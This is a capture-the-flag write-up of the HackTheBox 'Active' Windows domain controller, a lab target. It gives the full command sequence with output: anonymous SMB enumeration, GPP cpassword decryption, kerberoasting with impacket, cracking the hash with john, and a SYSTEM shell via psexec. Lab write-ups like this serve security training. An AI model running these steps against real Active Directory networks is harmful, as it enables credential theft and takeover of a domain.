Active from HackTheBox is an easy Windows box, in which we first find AD credentials in Group Policy Preferences and subsequently do a kerberoasting attack to get domain administrator.
Port Scanning
The open TCP ports indicate that we’re dealing with an AD domain controller running Windows Server 2008 R2:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-02 11:16:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Port 47001 reveals the hostname dc.active.htb, which we can verify using nslookup:
$ nslookup dc.active.htb 10.10.10.100
Server: 10.10.10.100
Address: 10.10.10.100#53
Name: dc.active.htb
Address: 10.10.10.100
Name: dc.active.htb
Address: dead:beef::959a:4178:9349:6835
So we can add the following to /etc/hosts:
10.10.10.100 active.htb dc.active.htb
SMB Enumeration
Using SMBMap we can list the SMB shares along with the permissions:
$ smbmap -H 10.10.10.100 --no-banner
[...SNIP...]
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
We can anonymously access the Replication share, so we download all files off it recursively:
$ smbclient //10.10.10.100/Replication -N
[...SNIP...]
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
[...SNIP...]
There are several files within the active.htb folder:
$ find active.htb -type f
active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI
active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
GPP Password
We are interested in the Groups.xml file, since these files may contain user account information including credentials:
$ cat active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
The file contains setings for the domain user SVC_TGS, one of which is the cpassword field, which contains the encrypted password. The key, however, is known and we can decrypt the password using a pre-installed Kali tool:
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
There is also an impacket script that bundles all of the work to find and decrypt the password:
$ impacket-Get-GPPPassword -share Replication 10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Listing shares...
- ADMIN$
- C$
- IPC$
- NETLOGON
- Replication
- SYSVOL
- Users
[*] Searching *.xml files...
[*] Found a Groups XML file:
[*] file : \\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
[*] newName :
[*] userName : active.htb\SVC_TGS
[*] password : GPPstillStandingStrong2k18
[*] changed : 2018-07-18 20:46:06
Access more SMB Shares
We can also access more shares using these credentials:
$ smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100 --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
With that access, we can find the user flag:
$ smbclient //10.10.10.100/Users -U svc_tgs%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
smb: \> more svc_tgs\\desktop\\user.txt
87b[...SNIP...]
Kerberoasting
Having AD credentials, we can enumerate the AD users using impacket:
$ impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: #GPPstillStandingStrong2k18
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 21:06:40.351723 2024-05-02 20:28:52.292542
Guest <never> <never>
krbtgt 2018-07-18 20:50:36.972031 <never>
SVC_TGS 2018-07-18 22:14:38.402764 2018-07-21 16:01:30.320277
We can use an impacket script called GetUserSPNs to find kerberoastable users as explained here:
$ impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/svc_tgs:GPPstillStandingStrong2k18 -outputfile hashes.kerberoast
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2024-05-02 20:28:52.292542
The hash within hashes.kerberoast can be cracked using john:
$ cat hashes.kerberoast
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$1e21af024af5c4e[...SNIP...]
$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:06 DONE (2024-05-02 17:28) 0.1447g/s 1524Kp/s 1524Kc/s 1524KC/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
With psexec it’s possible to get a shell and read ou the root flag:
$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[...SNIP...]
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop> type root.txt
43e[...SNIP...]
The ADenum tool would have also helped in enumerating kerberoastable users:
$ python ADenum.py -d active.htb -ip 10.10.10.100 -uSVC\_TGS -p "GPPstillStandingStrong2k18"
█████╗ ██████╗ ███████╗███╗ ██╗██╗ ██╗███╗ ███╗
██╔══██╗██╔══██╗ ██╔════╝████╗ ██║██║ ██║████╗ ████║
███████║██║ ██║ █████╗ ██╔██╗ ██║██║ ██║██╔████╔██║
██╔══██║██║ ██║ ██╔══╝ ██║╚██╗██║██║ ██║██║╚██╔╝██║
██║ ██║██████╔╝ ███████╗██║ ╚████║╚██████╔╝██║ ╚═╝ ██║
╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝
[*] Domain name: active.htb
[*] Username: SVC_TGS
[*] IP Address: 10.10.10.100
[!] SSL supported: FALSE
[!] SSL connect: FALSE
[+] Succesfully Authenticated With LDAP
[-] Authentication mechanism
[+] GSSAPI
[+] GSS-SPNEGO
[+] EXTERNAL
[!] DIGEST-MD5 Consider as weak security protocols
[-] LOGIN Plaintext password
[-] PLAIN Plaintext password
====================================================
===================== Enum LDAP ====================
====================================================
[-] Users who are Domain Admin
[*] Username: Administrator CN=Administrator,CN=Users,DC=active,DC=htb
[-] Domain Controllers
[*] Computer: DC$ CN=DC,OU=Domain Controllers,DC=active,DC=htb
[V] Windows Server 2008 R2 Standard 6.1 (7601)
[-] Users with Password Not Expire
[*] Username: Administrator CN=Administrator,CN=Users,DC=active,DC=htb
[*] Username: Guest CN=Guest,CN=Users,DC=active,DC=htb
[*] Username: SVC_TGS CN=SVC_TGS,CN=Users,DC=active,DC=htb
[-] Users with old password
[!] Username: Administrator Password last change: 2114 days ago 2018-07-18 19:06:40
[!] Username: krbtgt Password last change: 2114 days ago 2018-07-18 18:50:36
[!] Username: SVC_TGS Password last change: 2114 days ago 2018-07-18 20:14:38
[-] Users with an interesting description
[!] No entry found !
[-] Users with not the default encryption
[*] Username: Administrator Password is in a reversible encryption or in DES !
[-] Protecting Privileged Domain Accounts
[!] No entry found !
[-] Not Default Attributes (TEST IN BETA)
[!] No entry found !
[-] Laps Password
[!] No entry found !
====================================================
==================== Attack AD =====================
====================================================
[-] AS-REP Roastable Users
[!] No entry found !
[-] Kerberoastable Users
[*] Username: Administrator CN=Administrator,CN=Users,DC=active,DC=htb
[+] Hash added to file: kerbHash.hash
[-] Starting to crack hashs
[!] No entry found !